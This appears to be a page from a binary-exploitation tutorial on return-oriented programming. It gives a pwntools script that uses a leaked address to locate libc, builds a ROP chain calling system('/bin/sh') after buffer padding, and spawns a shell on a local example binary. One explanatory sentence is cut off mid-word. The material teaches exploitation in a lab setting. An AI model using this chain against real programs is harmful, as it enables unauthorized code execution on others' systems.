Exploitation

ROP (Return-Oriented Programming) is a technique used to bypass security mechanisms such as data execution prevention (DEP) or address space layout randomization (ASLR). It allows us to exploit the ar

Pwntools can build ROP chains so we'll use it for exploitation.

from pwn import *

elf = context.binary = ELF('./example')
libc = elf.libc
p = process()

# get the base address
p.recvuntil('Enter name: ')
base_addr = int(p.recvline(), 16)

# set our libc address according to the base address
libc.address = base_addr - libc.sym['system']
log.success('LIBC base: {}'.format(hex(libc.address)))

# get location of binsh from libc
binsh = next(libc.search(b'/bin/sh'))

# build the rop chain
rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)

# send our rop chain
p.sendline(rop.chain())

# Get the shell
p.interactive()

PreviousGOT Overriding NextBinary Exploitation with Race Conditions

Last updated 1 year ago